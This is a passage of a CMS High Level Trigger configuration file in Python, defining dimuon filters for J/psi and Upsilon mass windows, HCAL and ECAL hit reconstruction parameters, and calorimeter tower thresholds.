),\n MinPtMin = cms.double( 0.0 ),\n MinInvMass = cms.double( 2.8 ),\n MaxInvMass = cms.double( 3.35 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 999999.0 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( True )\n)\nhltPreDimuon0Upsilon = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltUpsilonL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 0.0 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 0.0 ),\n MinInvMass = cms.double( 8.5 ),\n MaxInvMass = cms.double( 11.5 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 2.5 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( True )\n)\nhltDisplacedmumuVtxProducerUpsilon = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltUpsilonL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterUpsilon = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.0050 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerUpsilon\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltL1sL1DoubleMu3 = cms.EDFilter( \"HLTLevel1GTSeed\",\n L1UseL1TriggerObjectMaps = cms.bool( True ),\n L1NrBxInEvent = cms.int32( 3 ),\n L1TechTriggerSeeding = cms.bool( False ),\n L1UseAliasesForSeeding = cms.bool( True ),\n L1SeedsLogicalExpression = cms.string( \"L1_DoubleMu3\" ),\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n L1GtObjectMapTag = cms.InputTag( \"hltL1GtObjectMap\" ),\n L1CollectionsTag = cms.InputTag( \"hltL1extraParticles\" ),\n L1MuonCollectionTag = cms.InputTag( \"hltL1extraParticles\" ),\n saveTags = cms.bool( True )\n)\nhltPreDimuon6LowMass = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltL1DiMuon6L1Filtered0 = cms.EDFilter( \"HLTMuonL1Filter\",\n CandTag = cms.InputTag( \"hltL1extraParticles\" ),\n PreviousCandTag = cms.InputTag( \"hltL1sL1DoubleMu3\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 3.0 ),\n MinN = cms.int32( 2 ),\n ExcludeSingleSegmentCSC = cms.bool( False ),\n CSCTFtag = cms.InputTag( \"unused\" ),\n saveTags = cms.bool( False ),\n SelectQualities = cms.vint32( )\n)\nhltL2DiMuon6L2PreFiltered0 = cms.EDFilter( \"HLTMuonL2PreFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL2MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltL1DiMuon6L1Filtered0\" ),\n SeedMapTag = cms.InputTag( \"hltL2Muons\" ),\n MinN = cms.int32( 2 ),\n MaxEta = cms.double( 2.5 ),\n MaxDr = cms.double( 9999.0 ),\n MaxDz = cms.double( 9999.0 ),\n MinPt = cms.double( 3.0 ),\n NSigmaPt = cms.double( 0.0 ),\n saveTags = cms.bool( True ),\n AbsEtaBins = cms.vdouble( 5.0 ),\n MinNstations = cms.vint32( 0 ),\n MinNhits = cms.vint32( 0 )\n)\nhltEcalRawToRecHitFacility = cms.EDProducer( \"EcalRawToRecHitFacility\",\n sourceTag = cms.InputTag( \"rawDataCollector\" ),\n workerName = cms.string( \"\" )\n)\nhltEcalRegionalMuonsFEDs = cms.EDProducer( \"EcalRawToRecHitRoI\",\n sourceTag = cms.InputTag( \"hltEcalRawToRecHitFacility\" ),\n type = cms.string( \"candidate\" ),\n doES = cms.bool( False ),\n sourceTag_es = cms.InputTag( \"NotNeededoESfalse\" ),\n esInstance = cms.untracked.string( \"es\" ),\n MuJobPSet = cms.PSet( ),\n JetJobPSet = cms.VPSet( \n ),\n EmJobPSet = cms.VPSet( \n ),\n CandJobPSet = cms.VPSet( \n cms.PSet( bePrecise = cms.bool( False ),\n propagatorNameToBePrecise = cms.string( \"\" ),\n epsilon = cms.double( 0.01 ),\n regionPhiMargin = cms.double( 0.3 ),\n cType = cms.string( \"chargedcandidate\" ),\n Source = cms.InputTag( \"hltL2MuonCandidates\" ),\n Ptmin = cms.double( 0.0 ),\n regionEtaMargin = cms.double( 0.3 )\n )\n )\n)\nhltEcalRegionalMuonsRecHit = cms.EDProducer( \"EcalRawToRecHitProducer\",\n lazyGetterTag = cms.InputTag( \"hltEcalRawToRecHitFacility\" ),\n sourceTag = cms.InputTag( \"hltEcalRegionalMuonsFEDs\" ),\n splitOutput = cms.bool( True ),\n EBrechitCollection = cms.string( \"EcalRecHitsEB\" ),\n EErechitCollection = cms.string( \"EcalRecHitsEE\" ),\n rechitCollection = cms.string( \"NotNeededsplitOutputTrue\" ),\n cleaningConfig = cms.PSet( \n tightenCrack_e1_double = cms.double( 2.0 ),\n tightenCrack_e6e2_double = cms.double( 3.0 ),\n e4e1Threshold_endcap = cms.double( 0.3 ),\n tightenCrack_e4e1_single = cms.double( 3.0 ),\n cThreshold_barrel = cms.double( 4.0 ),\n e4e1Threshold_barrel = cms.double( 0.08 ),\n tightenCrack_e1_single = cms.double( 2.0 ),\n e4e1_b_barrel = cms.double( -0.024 ),\n e4e1_a_barrel = cms.double( 0.04 ),\n ignoreOutOfTimeThresh = cms.double( 1000000.0 ),\n cThreshold_endcap = cms.double( 15.0 ),\n e4e1_b_endcap = cms.double( -0.0125 ),\n e4e1_a_endcap = cms.double( 0.02 ),\n e6e2thresh = cms.double( 0.04 ),\n cThreshold_double = cms.double( 10.0 ),\n swissCrossThreshold = cms.double( 0.95 ),\n recHitThreshold = cms.double( 4.0 ),\n useieta85 = cms.bool( True )\n )\n)\nhltHcalDigis = cms.EDProducer( \"HcalRawToDigi\",\n InputLabel = cms.InputTag( \"rawDataCollector\" ),\n UnpackCalib = cms.untracked.bool( True ),\n UnpackZDC = cms.untracked.bool( True ),\n UnpackTTP = cms.untracked.bool( False ),\n silent = cms.untracked.bool( True ),\n ComplainEmptyData = cms.untracked.bool( False ),\n FEDs = cms.untracked.vint32( ),\n firstSample = cms.int32( 0 ),\n lastSample = cms.int32( 9 ),\n FilterDataQuality = cms.bool( True )\n)\nhltHbhereco = cms.EDProducer( \"HcalHitReconstructor\",\n correctForTimeslew = cms.bool( True ),\n correctForPhaseContainment = cms.bool( True ),\n correctionPhaseNS = cms.double( 13.0 ),\n digiLabel = cms.InputTag( \"hltHcalDigis\" ),\n correctTiming = cms.bool( False ),\n setNoiseFlags = cms.bool( False ),\n setHSCPFlags = cms.bool( False ),\n setSaturationFlags = cms.bool( False ),\n setTimingTrustFlags = cms.bool( False ),\n setPulseShapeFlags = cms.bool( False ),\n dropZSmarkedPassed = cms.bool( True ),\n firstAuxTS = cms.int32( 4 ),\n firstSample = cms.int32( 4 ),\n samplesToAdd = cms.int32( 4 ),\n tsFromDB = cms.bool( True ),\n useLeakCorrection = cms.bool( False ),\n Subdetector = cms.string( \"HBHE\" ),\n setTimingShapedCutsFlags = cms.bool( False ),\n digistat = cms.PSet( ),\n HFInWindowStat = cms.PSet( ),\n S9S1stat = cms.PSet( \n longETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n shortEnergyParams = cms.vdouble( 35.1773, 35.37, 35.7933, 36.4472, 37.3317, 38.4468, 39.7925, 41.3688, 43.1757, 45.2132, 47.4813, 49.98, 52.7093 ),\n flagsToSkip = cms.int32( 24 ),\n shortETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n short_optimumSlope = cms.vdouble( -99999.0, 0.0164905, 0.0238698, 0.0321383, 0.041296, 0.0513428, 0.0622789, 0.0741041, 0.0868186, 0.100422, 0.135313, 0.136289, 0.0589927 ),\n longEnergyParams = cms.vdouble( 43.5, 45.7, 48.32, 51.36, 54.82, 58.7, 63.0, 67.72, 72.86, 78.42, 84.4, 90.8, 97.62 ),\n long_optimumSlope = cms.vdouble( -99999.0, 0.0164905, 0.0238698, 0.0321383, 0.041296, 0.0513428, 0.0622789, 0.0741041, 0.0868186, 0.100422, 0.135313, 0.136289, 0.0589927 ),\n isS8S1 = cms.bool( False ),\n HcalAcceptSeverityLevel = cms.int32( 9 )\n ),\n S8S1stat = cms.PSet( \n longETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n shortEnergyParams = cms.vdouble( 40.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0 ),\n flagsToSkip = cms.int32( 16 ),\n shortETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n short_optimumSlope = cms.vdouble( 0.3, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1 ),\n longEnergyParams = cms.vdouble( 40.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0 ),\n long_optimumSlope = cms.vdouble( 0.3, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1 ),\n isS8S1 = cms.bool( True ),\n HcalAcceptSeverityLevel = cms.int32( 9 )\n ),\n PETstat = cms.PSet( \n longETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n short_R_29 = cms.vdouble( 0.8 ),\n shortEnergyParams = cms.vdouble( 35.1773, 35.37, 35.7933, 36.4472, 37.3317, 38.4468, 39.7925, 41.3688, 43.1757, 45.2132, 47.4813, 49.98, 52.7093 ),\n flagsToSkip = cms.int32( 0 ),\n short_R = cms.vdouble( 0.8 ),\n shortETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n long_R_29 = cms.vdouble( 0.8 ),\n longEnergyParams = cms.vdouble( 43.5, 45.7, 48.32, 51.36, 54.82, 58.7, 63.0, 67.72, 72.86, 78.42, 84.4, 90.8, 97.62 ),\n long_R = cms.vdouble( 0.98 ),\n HcalAcceptSeverityLevel = cms.int32( 9 )\n ),\n saturationParameters = cms.PSet( maxADCvalue = cms.int32( 127 ) ),\n timingshapedcutsParameters = cms.PSet( \n ignorelowest = cms.bool( True ),\n win_offset = cms.double( 0.0 ),\n ignorehighest = cms.bool( False ),\n win_gain = cms.double( 1.0 ),\n tfilterEnvelope = cms.vdouble( 4.0, 12.04, 13.0, 10.56, 23.5, 8.82, 37.0, 7.38, 56.0, 6.3, 81.0, 5.64, 114.5, 5.44, 175.5, 5.38, 350.5, 5.14 )\n ),\n flagParameters = cms.PSet( \n nominalPedestal = cms.double( 3.0 ),\n hitMultiplicityThreshold = cms.int32( 17 ),\n hitEnergyMinimum = cms.double( 1.0 ),\n pulseShapeParameterSets = cms.VPSet( \n cms.PSet( pulseShapeParameters = cms.vdouble( 0.0, 100.0, -50.0, 0.0, -15.0, 0.15 ) ),\n cms.PSet( pulseShapeParameters = cms.vdouble( 100.0, 2000.0, -50.0, 0.0, -5.0, 0.05 ) ),\n cms.PSet( pulseShapeParameters = cms.vdouble( 2000.0, 1000000.0, -50.0, 0.0, 95.0, 0.0 ) ),\n cms.PSet( pulseShapeParameters = cms.vdouble( -1000000.0, 1000000.0, 45.0, 0.1, 1000000.0, 0.0 ) )\n )\n ),\n hscpParameters = cms.PSet( \n slopeMax = cms.double( -0.6 ),\n r1Max = cms.double( 1.0 ),\n r1Min = cms.double( 0.15 ),\n TimingEnergyThreshold = cms.double( 30.0 ),\n slopeMin = cms.double( -1.5 ),\n outerMin = cms.double( 0.0 ),\n outerMax = cms.double( 0.1 ),\n fracLeaderMin = cms.double( 0.4 ),\n r2Min = cms.double( 0.1 ),\n r2Max = cms.double( 0.5 ),\n fracLeaderMax = cms.double( 0.7 )\n ),\n pulseShapeParameters = cms.PSet( ),\n hfTimingTrustParameters = cms.PSet( \n hfTimingTrustLevel2 = cms.int32( 4 ),\n hfTimingTrustLevel1 = cms.int32( 1 )\n ),\n firstAuxOffset = cms.int32( 0 )\n)\nhltHfreco = cms.EDProducer( \"HcalHitReconstructor\",\n correctForTimeslew = cms.bool( False ),\n correctForPhaseContainment = cms.bool( False ),\n correctionPhaseNS = cms.double( 0.0 ),\n digiLabel = cms.InputTag( \"hltHcalDigis\" ),\n correctTiming = cms.bool( False ),\n setNoiseFlags = cms.bool( True ),\n setHSCPFlags = cms.bool( False ),\n setSaturationFlags = cms.bool( False ),\n setTimingTrustFlags = cms.bool( False ),\n setPulseShapeFlags = cms.bool( False ),\n dropZSmarkedPassed = cms.bool( True ),\n firstAuxTS = cms.int32( 1 ),\n firstSample = cms.int32( 2 ),\n samplesToAdd = cms.int32( 2 ),\n tsFromDB = cms.bool( True ),\n useLeakCorrection = cms.bool( False ),\n Subdetector = cms.string( \"HF\" ),\n setTimingShapedCutsFlags = cms.bool( False ),\n digistat = cms.PSet( \n HFdigiflagFirstSample = cms.int32( 1 ),\n HFdigiflagMinEthreshold = cms.double( 40.0 ),\n HFdigiflagSamplesToAdd = cms.int32( 3 ),\n HFdigiflagCoef0 = cms.double( 0.93 ),\n HFdigiflagCoef2 = cms.double( -0.012667 ),\n HFdigiflagCoef1 = cms.double( -0.38275 ),\n HFdigiflagExpectedPeak = cms.int32( 2 )\n ),\n HFInWindowStat = cms.PSet( \n hflongEthresh = cms.double( 40.0 ),\n hflongMinWindowTime = cms.vdouble( -10.0 ),\n hfshortEthresh = cms.double( 40.0 ),\n hflongMaxWindowTime = cms.vdouble( 10.0 ),\n hfshortMaxWindowTime = cms.vdouble( 10.0 ),\n hfshortMinWindowTime = cms.vdouble( -12.0 )\n ),\n S9S1stat = cms.PSet( \n longETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n shortEnergyParams = cms.vdouble( 35.1773, 35.37, 35.7933, 36.4472, 37.3317, 38.4468, 39.7925, 41.3688, 43.1757, 45.2132, 47.4813, 49.98, 52.7093 ),\n flagsToSkip = cms.int32( 24 ),\n shortETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n short_optimumSlope = cms.vdouble( -99999.0, 0.0164905, 0.0238698, 0.0321383, 0.041296, 0.0513428, 0.0622789, 0.0741041, 0.0868186, 0.100422, 0.135313, 0.136289, 0.0589927 ),\n longEnergyParams = cms.vdouble( 43.5, 45.7, 48.32, 51.36, 54.82, 58.7, 63.0, 67.72, 72.86, 78.42, 84.4, 90.8, 97.62 ),\n long_optimumSlope = cms.vdouble( -99999.0, 0.0164905, 0.0238698, 0.0321383, 0.041296, 0.0513428, 0.0622789, 0.0741041, 0.0868186, 0.100422, 0.135313, 0.136289, 0.0589927 ),\n isS8S1 = cms.bool( False ),\n HcalAcceptSeverityLevel = cms.int32( 9 )\n ),\n S8S1stat = cms.PSet( \n longETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n shortEnergyParams = cms.vdouble( 40.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0 ),\n flagsToSkip = cms.int32( 16 ),\n shortETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n short_optimumSlope = cms.vdouble( 0.3, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1 ),\n longEnergyParams = cms.vdouble( 40.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0 ),\n long_optimumSlope = cms.vdouble( 0.3, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1 ),\n isS8S1 = cms.bool( True ),\n HcalAcceptSeverityLevel = cms.int32( 9 )\n ),\n PETstat = cms.PSet( \n longETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n short_R_29 = cms.vdouble( 0.8 ),\n shortEnergyParams = cms.vdouble( 35.1773, 35.37, 35.7933, 36.4472, 37.3317, 38.4468, 39.7925, 41.3688, 43.1757, 45.2132, 47.4813, 49.98, 52.7093 ),\n flagsToSkip = cms.int32( 0 ),\n short_R = cms.vdouble( 0.8 ),\n shortETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n long_R_29 = cms.vdouble( 0.8 ),\n longEnergyParams = cms.vdouble( 43.5, 45.7, 48.32, 51.36, 54.82, 58.7, 63.0, 67.72, 72.86, 78.42, 84.4, 90.8, 97.62 ),\n long_R = cms.vdouble( 0.98 ),\n HcalAcceptSeverityLevel = cms.int32( 9 )\n ),\n saturationParameters = cms.PSet( maxADCvalue = cms.int32( 127 ) ),\n timingshapedcutsParameters = cms.PSet( \n ignorelowest = cms.bool( True ),\n win_offset = cms.double( 0.0 ),\n ignorehighest = cms.bool( False ),\n win_gain = cms.double( 1.0 ),\n tfilterEnvelope = cms.vdouble( 4.0, 12.04, 13.0, 10.56, 23.5, 8.82, 37.0, 7.38, 56.0, 6.3, 81.0, 5.64, 114.5, 5.44, 175.5, 5.38, 350.5, 5.14 )\n ),\n flagParameters = cms.PSet( \n nominalPedestal = cms.double( 3.0 ),\n hitMultiplicityThreshold = cms.int32( 17 ),\n hitEnergyMinimum = cms.double( 1.0 ),\n pulseShapeParameterSets = cms.VPSet( \n cms.PSet( pulseShapeParameters = cms.vdouble( 0.0, 100.0, -50.0, 0.0, -15.0, 0.15 ) ),\n cms.PSet( pulseShapeParameters = cms.vdouble( 100.0, 2000.0, -50.0, 0.0, -5.0, 0.05 ) ),\n cms.PSet( pulseShapeParameters = cms.vdouble( 2000.0, 1000000.0, -50.0, 0.0, 95.0, 0.0 ) ),\n cms.PSet( pulseShapeParameters = cms.vdouble( -1000000.0, 1000000.0, 45.0, 0.1, 1000000.0, 0.0 ) )\n )\n ),\n hscpParameters = cms.PSet( \n slopeMax = cms.double( -0.6 ),\n r1Max = cms.double( 1.0 ),\n r1Min = cms.double( 0.15 ),\n TimingEnergyThreshold = cms.double( 30.0 ),\n slopeMin = cms.double( -1.5 ),\n outerMin = cms.double( 0.0 ),\n outerMax = cms.double( 0.1 ),\n fracLeaderMin = cms.double( 0.4 ),\n r2Min = cms.double( 0.1 ),\n r2Max = cms.double( 0.5 ),\n fracLeaderMax = cms.double( 0.7 )\n ),\n pulseShapeParameters = cms.PSet( ),\n hfTimingTrustParameters = cms.PSet( \n hfTimingTrustLevel2 = cms.int32( 4 ),\n hfTimingTrustLevel1 = cms.int32( 1 )\n ),\n firstAuxOffset = cms.int32( 0 )\n)\nhltHoreco = cms.EDProducer( \"HcalHitReconstructor\",\n correctForTimeslew = cms.bool( True ),\n correctForPhaseContainment = cms.bool( True ),\n correctionPhaseNS = cms.double( 13.0 ),\n digiLabel = cms.InputTag( \"hltHcalDigis\" ),\n correctTiming = cms.bool( False ),\n setNoiseFlags = cms.bool( False ),\n setHSCPFlags = cms.bool( False ),\n setSaturationFlags = cms.bool( False ),\n setTimingTrustFlags = cms.bool( False ),\n setPulseShapeFlags = cms.bool( False ),\n dropZSmarkedPassed = cms.bool( True ),\n firstAuxTS = cms.int32( 4 ),\n firstSample = cms.int32( 4 ),\n samplesToAdd = cms.int32( 4 ),\n tsFromDB = cms.bool( True ),\n useLeakCorrection = cms.bool( False ),\n Subdetector = cms.string( \"HO\" ),\n setTimingShapedCutsFlags = cms.bool( False ),\n digistat = cms.PSet( ),\n HFInWindowStat = cms.PSet( ),\n S9S1stat = cms.PSet( \n longETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n HcalAcceptSeverityLevel = cms.int32( 9 ),\n shortEnergyParams = cms.vdouble( 35.1773, 35.37, 35.7933, 36.4472, 37.3317, 38.4468, 39.7925, 41.3688, 43.1757, 45.2132, 47.4813, 49.98, 52.7093 ),\n flagsToSkip = cms.int32( 24 ),\n shortETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n short_optimumSlope = cms.vdouble( -99999.0, 0.0164905, 0.0238698, 0.0321383, 0.041296, 0.0513428, 0.0622789, 0.0741041, 0.0868186, 0.100422, 0.135313, 0.136289, 0.0589927 ),\n longEnergyParams = cms.vdouble( 43.5, 45.7, 48.32, 51.36, 54.82, 58.7, 63.0, 67.72, 72.86, 78.42, 84.4, 90.8, 97.62 ),\n long_optimumSlope = cms.vdouble( -99999.0, 0.0164905, 0.0238698, 0.0321383, 0.041296, 0.0513428, 0.0622789, 0.0741041, 0.0868186, 0.100422, 0.135313, 0.136289, 0.0589927 ),\n isS8S1 = cms.bool( False )\n ),\n S8S1stat = cms.PSet( \n longETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n HcalAcceptSeverityLevel = cms.int32( 9 ),\n shortEnergyParams = cms.vdouble( 40.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0 ),\n flagsToSkip = cms.int32( 16 ),\n shortETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n short_optimumSlope = cms.vdouble( 0.3, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1 ),\n longEnergyParams = cms.vdouble( 40.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0, 100.0 ),\n long_optimumSlope = cms.vdouble( 0.3, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1 ),\n isS8S1 = cms.bool( True )\n ),\n PETstat = cms.PSet( \n longETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n short_R_29 = cms.vdouble( 0.8 ),\n HcalAcceptSeverityLevel = cms.int32( 9 ),\n shortEnergyParams = cms.vdouble( 35.1773, 35.37, 35.7933, 36.4472, 37.3317, 38.4468, 39.7925, 41.3688, 43.1757, 45.2132, 47.4813, 49.98, 52.7093 ),\n flagsToSkip = cms.int32( 0 ),\n long_R_29 = cms.vdouble( 0.8 ),\n shortETParams = cms.vdouble( 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0 ),\n short_R = cms.vdouble( 0.8 ),\n longEnergyParams = cms.vdouble( 43.5, 45.7, 48.32, 51.36, 54.82, 58.7, 63.0, 67.72, 72.86, 78.42, 84.4, 90.8, 97.62 ),\n long_R = cms.vdouble( 0.98 )\n ),\n saturationParameters = cms.PSet( maxADCvalue = cms.int32( 127 ) ),\n timingshapedcutsParameters = cms.PSet( \n ignorelowest = cms.bool( True ),\n win_offset = cms.double( 0.0 ),\n ignorehighest = cms.bool( False ),\n win_gain = cms.double( 1.0 ),\n tfilterEnvelope = cms.vdouble( 4.0, 12.04, 13.0, 10.56, 23.5, 8.82, 37.0, 7.38, 56.0, 6.3, 81.0, 5.64, 114.5, 5.44, 175.5, 5.38, 350.5, 5.14 )\n ),\n flagParameters = cms.PSet( \n nominalPedestal = cms.double( 3.0 ),\n hitMultiplicityThreshold = cms.int32( 17 ),\n hitEnergyMinimum = cms.double( 1.0 ),\n pulseShapeParameterSets = cms.VPSet( \n cms.PSet( pulseShapeParameters = cms.vdouble( 0.0, 100.0, -50.0, 0.0, -15.0, 0.15 ) ),\n cms.PSet( pulseShapeParameters = cms.vdouble( 100.0, 2000.0, -50.0, 0.0, -5.0, 0.05 ) ),\n cms.PSet( pulseShapeParameters = cms.vdouble( 2000.0, 1000000.0, -50.0, 0.0, 95.0, 0.0 ) ),\n cms.PSet( pulseShapeParameters = cms.vdouble( -1000000.0, 1000000.0, 45.0, 0.1, 1000000.0, 0.0 ) )\n )\n ),\n hscpParameters = cms.PSet( \n slopeMax = cms.double( -0.6 ),\n r1Max = cms.double( 1.0 ),\n r1Min = cms.double( 0.15 ),\n TimingEnergyThreshold = cms.double( 30.0 ),\n slopeMin = cms.double( -1.5 ),\n outerMin = cms.double( 0.0 ),\n outerMax = cms.double( 0.1 ),\n fracLeaderMin = cms.double( 0.4 ),\n r2Min = cms.double( 0.1 ),\n r2Max = cms.double( 0.5 ),\n fracLeaderMax = cms.double( 0.7 )\n ),\n pulseShapeParameters = cms.PSet( ),\n hfTimingTrustParameters = cms.PSet( \n hfTimingTrustLevel2 = cms.int32( 4 ),\n hfTimingTrustLevel1 = cms.int32( 1 )\n ),\n firstAuxOffset = cms.int32( 0 )\n)\nhltTowerMakerForMuons = cms.EDProducer( \"CaloTowersCreator\",\n EBThreshold = cms.double( 0.07 ),\n EEThreshold = cms.double( 0.3 ),\n UseEtEBTreshold = cms.bool( False ),\n UseEtEETreshold = cms.bool( False ),\n UseSymEBTreshold = cms.bool( False ),\n UseSymEETreshold = cms.bool( False ),\n HcalThreshold = cms.double( -1000.0 ),\n HBThreshold = cms.double( 0.7 ),\n HESThreshold = cms.double( 0.8 ),\n HEDThreshold = cms.double( 0.8 ),\n HOThreshold0 = cms.double( 3.5 ),\n HOThresholdPlus1 = cms.double( 3.5 ),\n HOThresholdMinus1 = cms.double( 3.5 ),\n HOThresholdPlus2 = cms.double( 3.5 ),\n HOThresholdMinus2 = cms.double( 3.5 ),\n HF1Threshold = cms.double( 0.5 ),\n HF2Threshold = cms.double( 0.85 ),\n EBWeight = cms.double( 1.0 ),\n EEWeight = cms.double( 1.0 ),\n HBWeight = cms.double( 1.0 ),\n HESWeight = cms.double( 1.0 ),\n HEDWeight = cms.double( 1.0 ),\n HOWeight = cms.double( 1.0E-99 ),\n HF1Weight = cms.double( 1.0 ),\n HF2Weight = cms.double( 1.0 ),\n EcutTower = cms.double( -1000.0 ),\n EBSumThreshold = cms.double( 0.2 ),\n EESumThreshold = cms.double( 0.45 ),\n UseHO = cms.bool( False ),\n MomConstrMethod = cms.int32( 1 ),\n MomHBDepth = cms.double( 0.2 ),\n MomHEDepth = cms.double( 0.4 ),\n MomEBDepth = cms.double( 0.3 ),\n MomEEDepth = cms.double( 0.0 ),\n hbheInput = cms.InputTag( \"hltHbhereco\" ),\n hoInput = cms.InputTag( \"hltHoreco\" ),\n hfInput = cms.InputTag( \"hltHfreco\" ),\n AllowMissingInputs = cms.bool( False ),\n HcalAcceptSeverityLevel = cms.uint32( 9 ),\n EcalAcceptSeverityLevel = cms.uint32( 3 ),\n UseHcalRecoveredHits = cms.bool( False ),\n UseEcalRecoveredHits = cms.bool( False ),\n 